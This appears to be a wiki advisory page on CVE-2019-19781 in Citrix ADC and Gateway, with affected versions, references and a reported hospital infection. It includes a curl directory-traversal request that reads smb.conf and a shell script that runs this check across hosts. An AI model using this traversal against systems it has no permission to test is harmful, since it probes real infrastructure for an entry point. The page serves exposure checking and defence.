#acl All:read

= General Disclosure =
A directory traversal bug in Citrix ADC (NetScaler) and Citrix Gateway lets an unauthenticated attacker reach a Perl script that writes attacker-controlled content into XML files on the appliance. This in turn allows for remote code execution. It became public on 17 December 2019 as CVE-2019-19781.

= POC =
If you want to test whether this exposure is mitigated, use the following:
{{{
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
}}}
The `--path-as-is` flag matters: without it curl normalises `/vpn/../vpns/` to `/vpns/` before sending the request, and the check no longer exercises the traversal.

Either a 403 response, or a response that returns the Citrix web page and NOT the smb.conf file itself, means you are patched or mitigated. If you can see the contents of smb.conf, you are vulnerable.

There is also a POC available on GitHub: [[https://github.com/trustedsec/cve-2019-19781]]

= Affected Systems =
The following versions are vulnerable to this attack:
 * Citrix ADC and Citrix Gateway version 13.0 all supported builds
 * Citrix ADC and NetScaler Gateway version 12.1 all supported builds
 * Citrix ADC and NetScaler Gateway version 12.0 all supported builds
 * Citrix ADC and NetScaler Gateway version 11.1 all supported builds
 * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

= Possible Mitigations =
Citrix has published a mitigation on its support site, linked below.
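To check a larger number of hosts for the mitigation, the POC request from the POC section can be wrapped in a small script that classifies the response the way the text describes. This is an added example, not code from the original page, from Citrix or from the trustedsec POC; `vpn.example.com` is a placeholder host, and the sample responses in the block are constructed, not real captures. It assumes that an unpatched appliance serves the real smb.conf (a Samba configuration containing a `[global]` section) and that a mitigated one answers either with a 403 or with the Citrix HTML page.

```shell
# classify_response STATUS BODY -> prints mitigated | vulnerable | unknown
# Assumed response shapes (see lead-in): 403 or the Citrix HTML page means
# mitigated, a body containing a Samba "[global]" section means vulnerable.
classify_response() {
    status="$1"
    body="$2"
    if [ "$status" = "403" ]; then
        echo mitigated
        return 0
    fi
    if [ "$status" = "200" ] && printf '%s\n' "$body" | grep -q '\[global\]'; then
        # the traversal reached the filesystem: smb.conf was served verbatim
        echo vulnerable
        return 0
    fi
    if [ "$status" = "200" ] && printf '%s\n' "$body" | grep -qi '<html'; then
        # the request was answered with the normal web page instead of the file
        echo mitigated
        return 0
    fi
    # anything else (timeout, 404, 5xx, a proxy in front): do not guess
    echo unknown
}

# check_host HOST: fetch the traversal URL and classify the answer.
# --path-as-is keeps curl from collapsing "/vpn/../vpns/" into "/vpns/"
# before the request leaves the client; without it the check is meaningless.
# -k is used because these appliances often carry internal certificates.
check_host() {
    host="$1"
    tmp=$(mktemp)
    status=$(curl -sk --max-time 10 --path-as-is \
        -o "$tmp" -w '%{http_code}' \
        "https://$host/vpn/../vpns/cfg/smb.conf" || true)
    body=$(cat "$tmp")
    rm -f "$tmp"
    printf '%s %s\n' "$host" "$(classify_response "$status" "$body")"
}

# Constructed sample responses (not real captures) so the classifier can be
# exercised without touching the network:
SAMPLE_SMB_CONF=$(printf '[global]\n\tencrypt passwords = yes\n\tname resolve order = lmhosts wins host bcast\n')
SAMPLE_HTML='<!DOCTYPE html><html><head><title>Citrix Gateway</title></head></html>'

classify_response 200 "$SAMPLE_SMB_CONF"   # vulnerable
classify_response 200 "$SAMPLE_HTML"       # mitigated
classify_response 403 ''                   # mitigated

# usage against a real host (placeholder name):
# check_host vpn.example.com
```

Run `check_host` once per hostname from a list; an "unknown" result should be looked at by hand rather than treated as safe, since a reverse proxy or WAF in front of the appliance can answer with something that is neither the file nor the Citrix page while the appliance behind it is still vulnerable.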
 * [[https://support.citrix.com/article/CTX267679]]

= Infections =
 * Medisch Centrum Leeuwarden (15 January 2020)
  * [[https://www.mcl.nl/mcl-actueel/2949-dataverkeer-met-buitenwereld-afgesloten|Press release]]

= References =
 * Citrix
  * [[https://support.citrix.com/article/CTX267027]]
 * NIST
  * [[https://nvd.nist.gov/vuln/detail/CVE-2019-19781]]
 * NCSC (Dutch)
  * [[https://www.ncsc.nl/actueel/advisory?id=NCSC%2D2019%2D0979]]
  * [[https://www.ncsc.nl/actueel/nieuws/2020/januari/9/aanvallers-zoeken-actief-naar-kwetsbare-citrix-servers]]
 * FireEye
  * [[https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html]]
 * Tweakers (Dutch)
  * [[https://tweakers.net/nieuws/162212/713-citrix-servers-in-nederland-zijn-kwetsbaar-voor-remote-code-execution.html]]
 * Media
  * [[https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/]]